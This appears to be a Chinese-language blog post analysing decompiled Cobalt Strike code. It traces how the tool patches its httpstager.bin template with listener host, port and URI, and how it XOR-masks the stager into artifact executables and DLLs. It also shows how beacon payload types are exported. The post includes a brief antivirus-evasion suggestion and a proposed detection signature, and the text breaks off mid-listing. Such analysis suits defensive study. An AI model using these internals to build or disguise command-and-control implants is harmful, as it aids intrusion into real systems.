<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203519702.png" alt="image-20200831203519702"></p>
<p>​        跟进GenericHTTPStager的构造方法，发现其又调用了父类GenericStager的构造方法</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203558124.png" alt="image-20200831203558124"></p>
<p>​        在GenericStager方法中，可以看到其实什么也没做</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203712286.png" alt="image-20200831203712286"></p>
<p>​        最后其实比较关键的代码是调用了generate方法</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203932934.png" alt="image-20200831203932934"></p>
<p>​        因为我的listener是http x86的listener，所以最终调用stagers\GenericHTTPStager.class的generate方法如下，</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831204215357.png" alt="image-20200831204215357"></p>
<p>​        在该代码种首先通过resouce方法加载资源，资源文件，资源文件是通过getStagetFile()获得的，在GenericHTTPStager.class中的getStagetFile是一个抽象方法，而且GenericHTTPStager也是一个抽象类，所以我们要在继承了GenericHTTPStager的子类中寻找getStagetFile的实现，最终在GenericHTTPStagerX86找到了getStagetFile的实现，是加载resources/httpstager.bin文件</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901094550546.png" alt="image-20200901094550546"></p>
<p>​        下面的代码中,读取httpstager.bin文件的内容，并且对其中的某些值进行替换，httpstager.bin其实就是shellcode生成的一个模板文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">public byte[] generate() &#123;</span><br><span class="line">       try &#123;</span><br><span class="line">           InputStream var1 &#x3D; CommonUtils.resource(this.getStagerFile());  &#x2F;&#x2F;读取httpstager.bin的内容</span><br><span class="line">           byte[] var2 &#x3D; CommonUtils.readAll(var1);</span><br><span class="line">           String var3 &#x3D; CommonUtils.bString(var2); &#x2F;&#x2F;从byte类型转换为字符串类型</span><br><span class="line">           var1.close();</span><br><span class="line">           var3 &#x3D; var3 + this.getListener().getStagerHost() + &#39;\u0000&#39;; &#x2F;&#x2F;从option中获取host</span><br><span class="line">           Packer var4 &#x3D; new Packer();  &#x2F;&#x2F;类中内置了对于字符串，字节，hex等处理的方法</span><br><span class="line">           var4.little(); &#x2F;&#x2F;字节顺序，决定大端字节和小端字节的读取问题</span><br><span class="line">           var4.addShort(this.getListener().getPort()); &#x2F;&#x2F;从option中获取port值</span><br><span class="line">           AssertUtils.TestPatchS(var2, 4444, this.getPortOffset()); &#x2F;&#x2F;判断getPortOffset的对应的值是否是4444</span><br><span class="line">           var3 &#x3D; CommonUtils.replaceAt(var3, CommonUtils.bString(var4.getBytes()), this.getPortOffset()); &#x2F;&#x2F;将4444替换为option设置的端口地址</span><br><span class="line">           var4 &#x3D; new Packer();</span><br><span class="line">           var4.little();</span><br><span class="line">           var4.addInt(1453503984); &#x2F;&#x2F;exit对应的偏移地址</span><br><span class="line">           AssertUtils.TestPatchI(var2, 1453503984, this.getExitOffset());</span><br><span class="line">           var3 &#x3D; CommonUtils.replaceAt(var3, CommonUtils.bString(var4.getBytes()), this.getExitOffset()); &#x2F;&#x2F;exit对应的偏移地址替换，不过这个看起来默认是没变的</span><br><span class="line">           var4 &#x3D; new Packer();</span><br><span class="line">           var4.little();</span><br><span class="line">           var4.addShort(this.getStagePreamble());&#x2F;&#x2F;在getStagePreamble中判断是否为forign类型，如果不是，则返回stage_offset。</span><br><span class="line">           AssertUtils.TestPatchS(var2, 5555, this.getSkipOffset()); &#x2F;&#x2F;判断getSkipOffset的返回值是否是5555</span><br><span class="line">           var3 &#x3D; CommonUtils.replaceAt(var3, CommonUtils.bString(var4.getBytes()), this.getSkipOffset()); &#x2F;&#x2F;将stage_offset的值进行替换</span><br><span class="line">           var4 &#x3D; new Packer();</span><br><span class="line">           var4.little();</span><br><span class="line">           var4.addInt(this.getConnectionFlags());  &#x2F;&#x2F;判断是否是https</span><br><span class="line">           AssertUtils.TestPatchI(var2, this.isSSL() ? -2069876224 : -2074082816, this.getFlagsOffset());</span><br><span class="line">           var3 &#x3D; CommonUtils.replaceAt(var3, CommonUtils.bString(var4.getBytes()), this.getFlagsOffset());</span><br><span class="line">           String var5;</span><br><span class="line">           if (CommonUtils.isin(CommonUtils.repeat(&quot;X&quot;, 303), var3)) &#123;</span><br><span class="line">               var5 &#x3D; this.getConfig().pad(this.getHeaders() + &#39;\u0000&#39;, 303);</span><br><span class="line">               var3 &#x3D; CommonUtils.replaceAt(var3, var5, var3.indexOf(CommonUtils.repeat(&quot;X&quot;, 127))); &#x2F;&#x2F;将hreader中的值进行替换</span><br><span class="line">           &#125;</span><br><span class="line"></span><br><span class="line">           int var6 &#x3D; var3.indexOf(CommonUtils.repeat(&quot;Y&quot;, 79), 0);</span><br><span class="line">           var5 &#x3D; this.getConfig().pad(this.getURI() + &#39;\u0000&#39;, 79);</span><br><span class="line">           var3 &#x3D; CommonUtils.replaceAt(var3, var5, var6); &#x2F;&#x2F;从config中获取url的值，并进行替换</span><br><span class="line">           return CommonUtils.toBytes(var3 + this.getConfig().getWatermark()); &#x2F;&#x2F;以字节数组的形式返回</span><br><span class="line">       &#125; catch (IOException var7) &#123;</span><br><span class="line">           MudgeSanity.logException(&quot;HttpStagerGeneric: &quot; + this.getStagerFile(), var7, false);</span><br><span class="line">           return new byte[0];</span><br><span class="line">       &#125;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>​        通过上面的分析，我们可以看出来，这里所作的操作就是读取httpstager.bin这个模板文件，然后对模板文件中的请求地址，请求头等地方进行替换。</p>
<p>​        再回到aggressor\dialogs\PayloadGeneratorDialog.class中，我们看下dialogResult方法,这个方法会针对我们选择不同的shellcode的生成类型，将stager转换为不同的类型，最后写入到文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">public void dialogResult(String var1) &#123;</span><br><span class="line">      String var2 &#x3D; DialogUtils.string(this.options, &quot;format&quot;);</span><br><span class="line">      boolean var3 &#x3D; DialogUtils.bool(this.options, &quot;x64&quot;);</span><br><span class="line">      String var4 &#x3D; DialogUtils.string(this.options, &quot;listener&quot;);</span><br><span class="line">      if (var2.equals(&quot;C&quot;)) &#123;</span><br><span class="line">          this.stager &#x3D; Transforms.toC(this.stager);</span><br><span class="line">      &#125; else if (var2.equals(&quot;C#&quot;)) &#123;</span><br><span class="line">          this.stager &#x3D; Transforms.toCSharp(this.stager);</span><br><span class="line">      &#125; else if (var2.equals(&quot;Java&quot;)) &#123;</span><br><span class="line">          this.stager &#x3D; Transforms.toJava(this.stager);</span><br><span class="line">      &#125; else if (var2.equals(&quot;Perl&quot;)) &#123;</span><br><span class="line">          this.stager &#x3D; Transforms.toPerl(this.stager);</span><br><span class="line">      &#125; else if (var2.equals(&quot;PowerShell&quot;) &amp;&amp; var3) &#123;</span><br><span class="line">          this.stager &#x3D; (new ResourceUtils(this.client)).buildPowerShell(this.stager, true);</span><br><span class="line">      &#125; else if (var2.equals(&quot;PowerShell&quot;) &amp;&amp; !var3) &#123;</span><br><span class="line">          this.stager &#x3D; (new ResourceUtils(this.client)).buildPowerShell(this.stager);</span><br><span class="line">      &#125; else if (var2.equals(&quot;PowerShell Command&quot;) &amp;&amp; var3) &#123;</span><br><span class="line">          this.stager &#x3D; (new PowerShellUtils(this.client)).buildPowerShellCommand(this.stager, true);</span><br><span class="line">      &#125; else if (var2.equals(&quot;PowerShell Command&quot;) &amp;&amp; !var3) &#123;</span><br><span class="line">          this.stager &#x3D; (new PowerShellUtils(this.client)).buildPowerShellCommand(this.stager, false);</span><br><span class="line">      &#125; else if (var2.equals(&quot;Python&quot;)) &#123;</span><br><span class="line">          this.stager &#x3D; Transforms.toPython(this.stager);</span><br><span class="line">      &#125; else if (!var2.equals(&quot;Raw&quot;)) &#123;</span><br><span class="line">          if (var2.equals(&quot;Ruby&quot;)) &#123;</span><br><span class="line">              this.stager &#x3D; Transforms.toPython(this.stager);</span><br><span class="line">          &#125; else if (var2.equals(&quot;COM Scriptlet&quot;)) &#123;</span><br><span class="line">              if (var3) &#123;</span><br><span class="line">                  DialogUtils.showError(var2 + &quot; is not compatible with x64 stagers&quot;);</span><br><span class="line">                  return;</span><br><span class="line">              &#125;</span><br><span class="line"></span><br><span class="line">              this.stager &#x3D; (new ArtifactUtils(this.client)).buildSCT(this.stager);</span><br><span class="line">          &#125; else if (var2.equals(&quot;Veil&quot;)) &#123;</span><br><span class="line">              this.stager &#x3D; Transforms.toVeil(this.stager);</span><br><span class="line">          &#125; else if (var2.equals(&quot;VBA&quot;)) &#123;</span><br><span class="line">              this.stager &#x3D; CommonUtils.toBytes(&quot;myArray &#x3D; &quot; + Transforms.toVBA(this.stager));</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      CommonUtils.writeToFile(new File(var1), this.stager);</span><br><span class="line">      DialogUtils.showInfo(&quot;Saved &quot; + var2 + &quot; to\n&quot; + var1);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>​        我们以C#为例来进行分析，主要代码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if (var2.equals(&quot;C#&quot;)) &#123;</span><br><span class="line">            this.stager &#x3D; Transforms.toCSharp(this.stager);</span><br></pre></td></tr></table></figure>

<p>​        跟进toCSharp方法，创建了一个Packer对象，添加了stager长度的字符串，再添加了stager字节数组的字符串。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901115643729.png" alt="image-20200901115643729"></p>
<p>​        最后再将生成的shellcode写入文件。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901115942287.png" alt="image-20200901115942287"></p>
<p>​        好了，关于payload generator的过程就分析到这里，可能由于个人水平有限，在静态代码分析的功底有限，有些地方可能分析的不对，不过这里大致的流程分析是没有问题的。主要是在stager生成这里，将httpstager.bin模板里的关于监听主机和端口以及uri的位置进行了替换和修改，然后根据不同的类型写入文件。所以如果要免杀，其实有一个思路也是可以将这个httpstager.bin的内容分析出来，将有特征的部分进行更改。</p>
<h3 id="windows-executable"><a href="#windows-executable" class="headerlink" title="windows executable"></a>windows executable</h3><p>​        windows executable是在WindowsExecutableDialog.class中进行处理的，其中关于stager生成的部分和payload generator相同，就不分析了，再看下dialogResult方法，先看下windows exe是怎么处理的，这里主要是调用了patchArtifact方法来进行处理，我们看下这个方法是做什么的。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901133939693.png" alt="image-20200901133939693"></p>
<p>​        跟进patchArtifact，发现内部还调用了patchArtifact方法</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901134326360.png" alt="image-20200901134326360"></p>
<p>​        继续跟进</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">public byte[] patchArtifact(byte[] var1, String var2) &#123;</span><br><span class="line">    Stack var3 &#x3D; new Stack();</span><br><span class="line">    var3.push(SleepUtils.getScalar(var1));</span><br><span class="line">    var3.push(SleepUtils.getScalar(var2));</span><br><span class="line">    String var4 &#x3D; this.client.getScriptEngine().format(&quot;EXECUTABLE_ARTIFACT_GENERATOR&quot;, var3);</span><br><span class="line">    return var4 &#x3D;&#x3D; null ? this.fixChecksum(this._patchArtifact(var1, var2)) : this.fixChecksum(CommonUtils.toBytes(var4));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​        主要看下_patchArtifact的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">public byte[] _patchArtifact(byte[] var1, String var2) &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">        InputStream var3 &#x3D; CommonUtils.resource(&quot;resources&#x2F;&quot; + var2); &#x2F;&#x2F;我这里var2是artifact64.exe，所以这里加载的是resources&#x2F;artifact64.exe</span><br><span class="line">        byte[] var4 &#x3D; CommonUtils.readAll(var3); &#x2F;&#x2F;读取artifact64.exe的内容</span><br><span class="line">        var3.close();</span><br><span class="line">        byte[] var5 &#x3D; new byte[]&#123;(byte)CommonUtils.rand(254), (byte)CommonUtils.rand(254), (byte)CommonUtils.rand(254), (byte)CommonUtils.rand(254)&#125;;</span><br><span class="line">        byte[] var6 &#x3D; new byte[var1.length];</span><br><span class="line"></span><br><span class="line">        for(int var7 &#x3D; 0; var7 &lt; var1.length; ++var7) &#123;</span><br><span class="line">            var6[var7] &#x3D; (byte)(var1[var7] ^ var5[var7 % 4]);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        String var12 &#x3D; CommonUtils.bString(var4);</span><br><span class="line">        int var8 &#x3D; var12.indexOf(CommonUtils.repeat(&quot;A&quot;, 1024));&#x2F;&#x2F;找到存在1024个A的位置</span><br><span class="line">        Packer var9 &#x3D; new Packer();</span><br><span class="line">        var9.little();</span><br><span class="line">        var9.addInteger(var8 + 16);</span><br><span class="line">        var9.addInteger(var1.length); &#x2F;&#x2F;写入stager的长度</span><br><span class="line">        var9.addString(var5, var5.length); &#x2F;&#x2F; 写入随机字符</span><br><span class="line">        var9.addString(&quot;aaaa&quot;, 4);  </span><br><span class="line">        var9.addString(var6, var6.length); &#x2F;&#x2F;写入stager内容</span><br><span class="line">        if (License.isTrial()) &#123;</span><br><span class="line">            var9.addString(&quot;X5O!P%@AP[4\\PZX54(P^)7CC)7&#125;$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*&quot;);</span><br><span class="line">            CommonUtils.print_trial(&quot;Added EICAR string to &quot; + var2);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        byte[] var10 &#x3D; var9.getBytes();</span><br><span class="line">        var12 &#x3D; CommonUtils.replaceAt(var12, CommonUtils.bString(var10), var8);</span><br><span class="line">        return CommonUtils.toBytes(var12);</span><br><span class="line">    &#125; catch (IOException var11) &#123;</span><br><span class="line">        MudgeSanity.logException(&quot;patchArtifact&quot;, var11, false);</span><br><span class="line">        return new byte[0];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​        总结一下上面的过程，主要就是将1024个A的地址进行替换，替换为随机字符和stager。        </p>
<p>​        用010 editor打开artifact64.exe文件，发现确实是有很多A</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901140702963.png" alt="image-20200901140702963"></p>
<p>​        我们再尝试生成一个x64的exe，用010 editor再看看里面的内容，我们可以看到在某处的开头是有aaaa，并且在最后还有一些大写的A,所以这两个点都可以当作CobaltStrike默认生成的exe的特征。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901142122258.png" alt="image-20200901142122258"></p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901142214196.png" alt="image-20200901142214196"></p>
<p>​        我再看了下dll和service类型的生成方式，发现最终都调用了_patchArtifact方法，因此他们这些模板文件中也都包含了1024个A，并且在替换的过程中首先也会写入四个a,我们以dll为例再看看。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901143237412.png" alt="image-20200901143237412"></p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901143245238.png" alt="image-20200901143245238"></p>
<p>​        那我们猜想一下，关于这个特征查杀是也可以根据首先出现4个a，在1024个字符以内，又同时出现10个A来进行检测呢？</p>
<h3 id="windows-executables"><a href="#windows-executables" class="headerlink" title="windows executables"></a>windows executables</h3><p>​        还有一种形式，我们在使用privote生成shellcode常用到，那就是windows executables生成的是stagerless类型，这种形式的生成是在WindowsExecutableStageDialog.class文件中</p>
<p>​        首先看下dialogAction中的代码，我们可以看到和payload generator和windows executable的形式不同，executables中并没有在这个方法中生成stager。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901144358493.png" alt="image-20200901144358493"></p>
<p>​        再看下dialogResult方法,和其他的方式不同，它也获取了SCListener，并通过调用export方法</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901144705204.png" alt="image-20200901144705204"></p>
<p>​        我们跟进export方法，export的代码如下，他根据payload的类型，调用了不同的方法，我们以最基本的http_reverse为例进行分析</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">public byte[] export(String var1, int var2) &#123;</span><br><span class="line">    if (&quot;windows&#x2F;foreign&#x2F;reverse_http&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return this.getPayloadStager(var1);</span><br><span class="line">    &#125; else if (&quot;windows&#x2F;foreign&#x2F;reverse_https&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return this.getPayloadStager(var1);</span><br><span class="line">    &#125; else if (&quot;windows&#x2F;beacon_http&#x2F;reverse_http&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return (new BeaconPayload(this, var2)).exportBeaconStageHTTP(this.getPort(), this.getCallbackHosts(), false, false, var1);</span><br><span class="line">    &#125; else if (&quot;windows&#x2F;beacon_https&#x2F;reverse_https&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return (new BeaconPayload(this, var2)).exportBeaconStageHTTP(this.getPort(), this.getCallbackHosts(), false, true, var1);</span><br><span class="line">    &#125; else if (&quot;windows&#x2F;beacon_dns&#x2F;reverse_dns_txt&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return (new BeaconPayload(this, var2)).exportBeaconStageDNS(this.getPort(), this.getCallbackHosts(), true, false, var1);</span><br><span class="line">    &#125; else if (&quot;windows&#x2F;beacon_bind_pipe&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return (new BeaconPayload(this, var2)).exportSMBStage(var1);</span><br><span class="line">    &#125; else if (&quot;windows&#x2F;beacon_bind_tcp&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return (new BeaconPayload(this, var2)).exportBindTCPStage(var1);</span><br><span class="line">    &#125; else if (&quot;windows&#x2F;beacon_reverse_tcp&quot;.equals(this.getPayload())) &#123;</span><br><span class="line">        return (new BeaconPayload(this, var2)).exportReverseTCPStage(var1);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        AssertUtils.TestFail(&quot;Unknown payload &#39;&quot; + this.getPayload() + &quot;&#39;&quot;);</span><br><span class="line">        return new byte[0];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​        我们发现其调用了exportBeaconStageHTTP方法，跟进这个方法，首先判断架构，再根据架构的不同给var6进行赋值，最后调用了exportBeaconStage方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">public byte[] exportBeaconStageHTTP(int var1, String var2, boolean var3, boolean var4, String var5) &#123;</span><br><span class="line">    AssertUtils.TestSetValue(var5, &quot;x86, x64&quot;);</span><br><span class="line">    String var6 &#x3D; &quot;&quot;;</span><br><span class="line">    if (&quot;x86&quot;.equals(var5)) &#123;</span><br><span class="line">        var6 &#x3D; &quot;resources&#x2F;beacon.dll&quot;;</span><br><span class="line">    &#125; else if (&quot;x64&quot;.equals(var5)) &#123;</span><br><span class="line">        var6 &#x3D; &quot;resources&#x2F;beacon.x64.dll&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return this.pe.process(this.exportBeaconStage(var1, var2, var3, var4, var6), var5);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​        跟进exportBeaconStage方法，这个方法比较长，我会把简单的分析写在注释中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span 